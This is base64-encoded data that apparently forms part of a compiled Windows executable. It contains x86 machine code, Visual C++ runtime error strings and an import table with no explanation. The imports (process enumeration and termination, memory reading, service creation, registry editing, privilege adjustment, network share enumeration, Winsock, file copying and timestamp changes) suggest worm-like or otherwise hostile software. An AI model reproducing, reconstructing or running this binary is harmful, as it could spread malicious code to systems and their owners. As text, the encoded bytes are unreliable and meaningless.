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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAJbcAACo3AAA2N0AAMDdAACe3QAAit0AALDdAABk3QAAUN0AAHrdAAAe3QAAEt0AADrd AADq3AAA2twAAAjdAABu3AAAXtwAAITcAAA+3AAAMNwAAEzcAADG3AAAItwAAAAAAAAg2gAA QNoAAFLaAABe2gAAatoAAAraAAA02gAAnNoAALLaAAC+2gAAztoAAODaAADQ2QAAftoAAI7a AAD02QAALtsAAEDbAABW2wAAatsAAILbAACS2wAAotsAALDbAADG2wAA2NsAAPTbAAAE3AAA 3tkAAKTZAADE2QAAtNkAAPDaAAAC2wAAdtkAAHDYAACQ2AAAktkAAITZAAA+2QAAYNkAAFDZ AAD82AAALtkAABjZAADK2AAA7NgAAN7YAACg2AAAttgAAK7YAAAQ2wAAHtsAAH7YAACs3gAA nN4AAA7gAAD+3wAA8N8AAODfAADO3wAAvN8AALDfAACi3wAAlN8AAIbfAAB43wAAaN8AAEbe AABa3gAAbN4AAHreAACG3gAAkN4AAFbfAAC83gAAyN4AANTeAADw3gAACt8AACTfAAA83wAA AAAAAC7eAAAa3gAACt4AAAAAAAA0AACAAwAAgHQAAIAQAACAEwAAgAkAAIAEAACAbwAAgHMA AIAXAACAAAAAAAAAAAAAAAAABQAAAAAAAAAHAAAACQAAAAUAAAACAAAAAgAAAAIAAAACAAAA DAAZAAEAAQACAA4ACgAfAAQAAQADABkACAAPAAIAAgALAAIAAQAGAP////8vhUAAQ4VAAAAA 
AAAAAAAAAAAAAP////8Ri0AAFYtAAP/////Fi0AAyYtAAAYAAAYAAQAAEAADBgAGAhAERUVF BQUFBQU1MABQAAAAACAoOFBYBwgANzAwV1AHAAAgIAgAAAAACGBoYGBgYAAAcHB4eHh4CAcI AAAHAAgICAAACAAIAAcIAAAAKABuAHUAbABsACkAAAAAAChudWxsKQAAcnVudGltZSBlcnJv ciAAAA0KAABUTE9TUyBlcnJvcg0KAAAAU0lORyBlcnJvcg0KAAAAAERPTUFJTiBlcnJvcg0K AABSNjAyOA0KLSB1bmFibGUgdG8gaW5pdGlhbGl6ZSBoZWFwDQoAAAAAUjYwMjcNCi0gbm90 IGVub3VnaCBzcGFjZSBmb3IgbG93aW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNg0KLSBu b3QgZW5vdWdoIHNwYWNlIGZvciBzdGRpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI1DQot IHB1cmUgdmlydHVhbCBmdW5jdGlvbiBjYWxsDQoAAABSNjAyNA0KLSBub3QgZW5vdWdoIHNw YWNlIGZvciBfb25leGl0L2F0ZXhpdCB0YWJsZQ0KAAAAAFI2MDE5DQotIHVuYWJsZSB0byBv cGVuIGNvbnNvbGUgZGV2aWNlDQoAAAAAUjYwMTgNCi0gdW5leHBlY3RlZCBoZWFwIGVycm9y DQoAAAAAUjYwMTcNCi0gdW5leHBlY3RlZCBtdWx0aXRocmVhZCBsb2NrIGVycm9yDQoAAAAA UjYwMTYNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgdGhyZWFkIGRhdGENCgANCmFibm9ybWFs IHByb2dyYW0gdGVybWluYXRpb24NCgAAAABSNjAwOQ0KLSBub3QgZW5vdWdoIHNwYWNlIGZv ciBlbnZpcm9ubWVudA0KAFI2MDA4DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIGFyZ3VtZW50 cw0KAAAAUjYwMDINCi0gZmxvYXRpbmcgcG9pbnQgbm90IGxvYWRlZA0KAAAAAE1pY3Jvc29m dCBWaXN1YWwgQysrIFJ1bnRpbWUgTGlicmFyeQAAAAAKCgAAUnVudGltZSBFcnJvciEKClBy b2dyYW06IAAAAC4uLgA8cHJvZ3JhbSBuYW1lIHVua25vd24+AAAAAAAA/////2GvQABlr0AA R2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEAdXNlcjMy LmRsbAAA6NYAAAAAAAAAAAAAFNwAAGTQAACE1gAAAAAAAAAAAADw3QAAANAAAETYAAAAAAAA AAAAAP7dAADA0QAANNgAAAAAAAAAAAAAPt4AALDRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJbc AACo3AAA2N0AAMDdAACe3QAAit0AALDdAABk3QAAUN0AAHrdAAAe3QAAEt0AADrdAADq3AAA 2twAAAjdAABu3AAAXtwAAITcAAA+3AAAMNwAAEzcAADG3AAAItwAAAAAAAAg2gAAQNoAAFLa AABe2gAAatoAAAraAAA02gAAnNoAALLaAAC+2gAAztoAAODaAADQ2QAAftoAAI7aAAD02QAA LtsAAEDbAABW2wAAatsAAILbAACS2wAAotsAALDbAADG2wAA2NsAAPTbAAAE3AAA3tkAAKTZ AADE2QAAtNkAAPDaAAAC2wAAdtkAAHDYAACQ2AAAktkAAITZAAA+2QAAYNkAAFDZAAD82AAA LtkAABjZAADK2AAA7NgAAN7YAACg2AAAttgAAK7YAAAQ2wAAHtsAAH7YAACs3gAAnN4AAA7g AAD+3wAA8N8AAODfAADO3wAAvN8AALDfAACi3wAAlN8AAIbfAAB43wAAaN8AAEbeAABa3gAA 
bN4AAHreAACG3gAAkN4AAFbfAAC83gAAyN4AANTeAADw3gAACt8AACTfAAA83wAAAAAAAC7e AAAa3gAACt4AAAAAAAA0AACAAwAAgHQAAIAQAACAEwAAgAkAAIAEAACAbwAAgHMAAIAXAACA AAAAALQARnJlZUxpYnJhcnkAPgFHZXRQcm9jQWRkcmVzcwAAwgFMb2FkTGlicmFyeUEAABsA Q2xvc2VIYW5kbGUAlgJTbGVlcACeAlRlcm1pbmF0ZVByb2Nlc3MAABwCUmVhZFByb2Nlc3NN ZW1vcnkA7wFPcGVuUHJvY2VzcwDZAU1vZHVsZTMyRmlyc3QATABDcmVhdGVUb29saGVscDMy U25hcHNob3QAACQBR2V0TW9kdWxlRmlsZU5hbWVBAAD+AVByb2Nlc3MzMk5leHQA/AFQcm9j ZXNzMzJGaXJzdAAA1gFNYXBWaWV3T2ZGaWxlADUAQ3JlYXRlRmlsZU1hcHBpbmdBAAASAUdl dEZpbGVTaXplADQAQ3JlYXRlRmlsZUEAsAJVbm1hcFZpZXdPZkZpbGUAGwFHZXRMb2NhbFRp bWUAABoBR2V0TGFzdEVycm9yAADMAUxvY2FsRnJlZQDIAUxvY2FsQWxsb2MAAPgAR2V0Q3Vy cmVudFByb2Nlc3NJZADSAldpZGVDaGFyVG9NdWx0aUJ5dGUA5AFNdWx0aUJ5dGVUb1dpZGVD aGFyAM4AR2V0Q29tcHV0ZXJOYW1lQQAAKABDb3B5RmlsZUEAuQFJc0RCQ1NMZWFkQnl0ZQAA 3wJXcml0ZUZpbGUAGAJSZWFkRmlsZQAAYwFHZXRUZW1wRmlsZU5hbWVBAABlAUdldFRlbXBQ YXRoQQAAVwBEZWxldGVGaWxlQQBoAlNldEZpbGVBdHRyaWJ1dGVzQQAAkABGaW5kQ2xvc2UA nQBGaW5kTmV4dEZpbGVBAJQARmluZEZpcnN0RmlsZUEAAGECU2V0RW5kT2ZGaWxlAABqAlNl dEZpbGVQb2ludGVyAAAUAUdldEZpbGVUaW1lAGwCU2V0RmlsZVRpbWUAbQFHZXRUaWNrQ291 bnQAAEQAQ3JlYXRlUHJvY2Vzc0EAAFkBR2V0U3lzdGVtRGlyZWN0b3J5QQD3AEdldEN1cnJl bnRQcm9jZXNzAJsCU3lzdGVtVGltZVRvRmlsZVRpbWUAAF0BR2V0U3lzdGVtVGltZQB1AUdl dFZlcnNpb25FeEEAdAFHZXRWZXJzaW9uAADOAldhaXRGb3JTaW5nbGVPYmplY3QAygBHZXRD b21tYW5kTGluZUEAgABFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBAAQBR2V0RHJpdmVUeXBl QQBKAENyZWF0ZVRocmVhZAAAS0VSTkVMMzIuZGxsAABbAVJlZ0Nsb3NlS2V5AGYBUmVnRW51 bUtleUEAcQFSZWdPcGVuS2V5QQBkAVJlZ0RlbGV0ZVZhbHVlQQBqAVJlZ0VudW1WYWx1ZUEA NABDbG9zZVNlcnZpY2VIYW5kbGUAAEwAQ3JlYXRlU2VydmljZUEAAEUBT3BlblNDTWFuYWdl ckEAALMBU3RhcnRTZXJ2aWNlQ3RybERpc3BhdGNoZXJBAK4BU2V0U2VydmljZVN0YXR1cwAA RwFPcGVuU2VydmljZUEAAI4BUmVnaXN0ZXJTZXJ2aWNlQ3RybEhhbmRsZXJBAJ0ARnJlZVNp ZACYAEVxdWFsU2lkAAAYAEFsbG9jYXRlQW5kSW5pdGlhbGl6ZVNpZAAA0ABHZXRUb2tlbklu Zm9ybWF0aW9uAEIBT3BlblByb2Nlc3NUb2tlbgAAXAFSZWdDb25uZWN0UmVnaXN0cnlBALIB U3RhcnRTZXJ2aWNlQQB7AVJlZ1F1ZXJ5VmFsdWVFeEEAAIYBUmVnU2V0VmFsdWVFeEEAAF4B 
UmVnQ3JlYXRlS2V5QQAXAEFkanVzdFRva2VuUHJpdmlsZWdlcwD1AExvb2t1cFByaXZpbGVn ZVZhbHVlQQBBRFZBUEkzMi5kbGwAAFdTMl8zMi5kbGwAABEAV05ldENsb3NlRW51bQAcAFdO ZXRFbnVtUmVzb3VyY2VBAEAAV05ldE9wZW5FbnVtQQBNUFIuZGxsACYBR2V0TW9kdWxlSGFu ZGxlQQAAUAFHZXRTdGFydHVwSW5mb0EAfQBFeGl0UHJvY2VzcwC/AEdldENQSW5mbwC5AEdl dEFDUAAAMQFHZXRPRU1DUAAAvwFMQ01hcFN0cmluZ0EAAMABTENNYXBTdHJpbmdXAACfAUhl YXBGcmVlAACZAUhlYXBBbGxvYwCtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAsgBGcmVl RW52aXJvbm1lbnRTdHJpbmdzQQCzAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAYBR2V0RW52 aXJvbm1lbnRTdHJpbmdzAAgBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbQJTZXRIYW5kbGVD b3VudAAAUgFHZXRTdGRIYW5kbGUAABUBR2V0RmlsZVR5cGUAnQFIZWFwRGVzdHJveQCbAUhl YXBDcmVhdGUAAL8CVmlydHVhbEZyZWUALwJSdGxVbndpbmQAUwFHZXRTdHJpbmdUeXBlQQAA VgFHZXRTdHJpbmdUeXBlVwAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAfAJTZXRT dGRIYW5kbGUAAKoARmx1c2hGaWxlQnVmZmVycwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 